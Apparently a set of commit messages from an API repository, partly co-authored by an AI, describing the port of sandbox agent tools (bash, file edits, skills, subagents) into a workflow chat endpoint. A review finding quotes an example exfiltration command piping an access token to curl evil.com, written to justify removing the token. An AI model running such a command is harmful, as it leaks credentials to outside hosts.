connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585) * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587) * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project- level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool. New skills layer (lib/skills/): - skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization) - parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs) - extractSkillBody.ts — strip frontmatter, return body - substituteArguments.ts — $ARGUMENTS replacement - injectSkillDirectory.ts — prepend `Skill directory: <path>` - discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new - getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model. Wire-up: - AgentContext gains `skills?: SkillMetadata[]` - buildAgentTools accepts `{ skills }`, registers skill tool when non-empty - runAgentStep passes `agentContext.skills` to buildAgentTools - handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request) Slim scope decisions: - Project skills only (no global ~/.skills/ scan yet) - No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session). Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(skills): match open-agents 3-path scan (was scanning the wrong dir) The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts): - \${workingDirectory}/.claude/skills/ (project, claude-style) - \${workingDirectory}/.agents/skills/ (project, agents-style) - \${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills) Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands. Changes: - getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root) - exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable - Handler awaits the async path resolution - New test suite covers all 3 paths + $HOME variants Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong. Full suite 3053/3053; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback) Two changes per user direction: 1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array. 2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast. Verified live on preview against \`recoupable/org-rostrum-pacific-...\` BEFORE this commit: - Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace) - Agent invoked \`skill({ skill: "recoup-api" })\` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header Full suite 3055/3055; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite: - lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists) - lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts - 2 new unit tests (standard path, trailing-slash tolerance) discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file). Full suite passes; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589) * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) Completes the open-agents tool surface. The agent now has all 11 tools. **ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) — client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool- call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed. **task** (lib/agent/tools/taskTool.ts) — slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub- `streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent. The subagent tool set deliberately EXCLUDES: - task (recursion guard — open-agents' three subagent types executor/explorer/design all explicitly omit task too; subagents are leaves of the agent tree) - ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, don't load further skills) AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. Handler populates it from chat.model_id or the platform default. buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog). Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature. Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(task-tool): provide non-empty subagent prompt The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError — surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors." Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS) Address PR review feedback: - SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file). - KISS: open-agents' AgentContext type does not have modelId — it uses model: LanguageModel / subagentModel?: LanguageModel. api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it. Also format-fixes askUserQuestionTool.ts toModelOutput arrow (parentheses around single param flagged by prettier in CI). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent): align AgentContext + model resolution with open-agents Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID): - AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents. - Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel"> for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs. - runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context — same pattern as open-agents' prepareCall in open-harness-agent.ts. - New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`. - taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls getSubagentModel(experimental_context, "task") instead — subagent now defaults to the same model the parent is running. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592) * feat(chat-workflow): emit per-message cost/usage metadata (Bundle C) First step in the open-agents → api cutover sequence. Adds a messageMetadata callback to runAgentStep's toUIMessageStream call so the UI receives {modelId, lastStepUsage, totalMessageUsage, lastStepCost, totalMessageCost, stepFinishReasons} on every assistant turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte so sandbox.recoupable.com's model/cost badges keep working when cut over to /api/chat/workflow. New (SRP, one function per file): - lib/agent/messageMetadata/extractGatewayCost.ts — port of open-agents' gateway-metadata.ts, parses gateway-reported per-step cost from providerMetadata. - lib/agent/messageMetadata/addLanguageModelUsage.ts — port of open-agents' usage.ts, pointwise-sums LanguageModelUsage records. - lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring open-agents' WebAgentMessageMetadata. - lib/agent/messageMetadata/buildMessageMetadataCallback.ts — stateful factory returning a fresh callback per turn; accumulates usage + cost across finish-step parts. Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called this out as a known gap from the original workflow port (PR 4). Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage Address PR review feedback (one exported function per file) and adopt the user's preferred path of upgrading api's `ai` package rather than maintaining a normalization shim: - Extract addTokenCounts.ts (used by addLanguageModelUsage) - Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by extractGatewayCost) - Split AgentStepFinishMetadata into its own file (was co-located in AgentMessageMetadata) Upgrade the AI SDK so the wire format matches open-agents natively: - ai: 6.0.0-beta.122 → ^6.0.190 - @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai, @ai-sdk/mcp: all bumped to latest stable The new SDK's LanguageModelUsage is the flat shape (top-level `inputTokens` number + nested `inputTokenDetails`) — identical to open-agents' wire format. No conversion needed, so: - Delete normalizeUsage.ts + test (net -82 LOC) - Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage directly) Production code changes for the SDK upgrade: - runAgentStep + setupChatRequest: await convertToModelMessages (now returns Promise<ModelMessage[]>) Tests: 3106/3106 pass; production typecheck clean; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594) Convert taskTool.execute from `async () =>` to `async function*`, mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple chunks during the subagent run so the chat UI can render: - An initial "Subagent · 0 tools · 0 tokens" card with stable startedAt timestamp - A live `pending: {name, input}` indicator for each tool-call - Accumulated `usage` after each finish-step - A final `{final: ModelMessage[], ...}` chunk containing the full subagent transcript for expandable rendering `toModelOutput` mirrors open-agents' implementation: extracts the last assistant text part from `output.final` for inclusion in the parent agent's context. New (SRP, one function per file): - lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps addLanguageModelUsage to handle undefined inputs without introducing zero-tokens placeholders. Drive-by fix: askUserQuestionTool's `toModelOutput` signature was `(output) =>` from the older beta SDK era. The current SDK (ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to `({ output }) =>` so the function actually receives the user's answers at runtime — was previously falling through to the generic "User responded to questions." path. Tests updated to match. Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9 askUserQuestion); full suite 3114/3114 pass; lint clean. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). - persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 